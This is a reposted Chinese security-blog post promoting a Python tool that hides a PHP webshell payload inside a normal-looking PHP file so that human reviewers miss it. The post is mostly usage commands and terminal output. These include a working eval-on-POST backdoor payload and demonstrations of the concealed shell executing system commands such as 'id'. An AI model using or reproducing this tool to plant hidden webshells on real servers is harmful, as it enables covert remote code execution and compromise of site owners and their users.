webshell生成(绕过)工具 -- webshell-bypassed-human
2022-10-31 11:51:35 Author: 橘猫学安全(查看原文) 阅读量:21 收藏

一、过人 webshell 的生成工具

» python hide_webshell.pyusage: hide_webshell.py [-h] -pf PAYLOAD_FILE [--pro] [-wf WEBSHELL_FILE] [--debug] phphide_webshell.py: error: the following arguments are required: php, -pf/--payload_file

将 payload 放在 -pf 所指定的路径

二、hide webshell

python hide_webshell.py hide_webshell.py normal.php -pf payload.txt

三、hide webshell pro

python hide_webshell.py normal_pro.php -pf payload.txt --pro

四、payload 示例

system("echo \"hacked by Tr0y :)\"");@eval($_POST["c"]);

五、完整示例

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:45:27]» cat payload.txtsystem("echo \"hacked by Tr0y :)\"");%

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:45:28]» p hide_webshell.py normal.php -pf payload.txt && php webshell_hidden.php[+] Hide webshell in normal mode [-] Get payload from payload.txt Payload is system("echo \"hacked by Tr0y :)\""); [-] Get php code from normal.php[!] Saved webshell as webshell_hidden.php[!] All done

Bye :)hacked by Tr0y :)

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:45:31]» p hide_webshell.py normal_pro.php -pf payload.txt --pro && php webshell_hidden.php[+] Hide webshell in pro mode [-] Get payload from payload.txt Payload is system("echo \"hacked by Tr0y :)\""); [-] Get php code from normal_pro.php[!] Saved webshell as webshell_hidden.php[!] All done

Bye :)hacked by Tr0y :)

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:48:23]» cat payload.txt@eval($_POST["c"]);%

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:48:24]» p hide_webshell.py normal.php -pf payload.txt && php -r '$_POST["c"]="system(\"id\");"; require("webshell_hidden.php");'[+] Hide webshell in normal mode [-] Get payload from payload.txt Payload is @eval($_POST["c"]); [-] Get php code from normal.php[!] Saved webshell as webshell_hidden.php[!] All done

Bye :)uid=502(macr0phag3) gid=20(staff) groups=20(staff),12(everyone), ...此处省略

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:48:26]» p hide_webshell.py normal_pro.php -pf payload.txt --pro && php -r '$_POST["c"]="system(\"id\");"; require("webshell_hidden.php");'[+] Hide webshell in pro mode [-] Get payload from payload.txt Payload is @eval($_POST["c"]); [-] Get php code from normal_pro.php[!] Saved webshell as webshell_hidden.php[!] All done

Bye :)uid=502(macr0phag3) gid=20(staff) groups=20(staff),12(everyone), ...此处省略

六、下载地址

https:

如有侵权,请联系删除

推荐阅读

实战|记一次奇妙的文件上传getshell
「 超详细 | 分享 」手把手教你如何进行内网渗透
神兵利器 | siusiu-渗透工具管理套件
一款功能全面的XSS扫描器
实战 | 一次利用哥斯拉马绕过宝塔waf
BurpCrypto: 万能网站密码爆破测试工具
快速筛选真实IP并整理为C段 -- 棱眼
自动探测端口顺便爆破工具t14m4t
渗透工具|无状态子域名爆破工具(1秒扫160万个子域)
查看更多精彩内容,还请关注橘猫学安全:
每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“再看

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247500101&idx=1&sn=6a3d17fd5904f80b7e4eb5d4b3331af6&chksm=c04d467bf73acf6d976d14dd238ce4cb1275889de31bb8588fc29e0b0e53c52da79b7e05cb6b#rd
如有侵权请联系:admin#unsafe.sh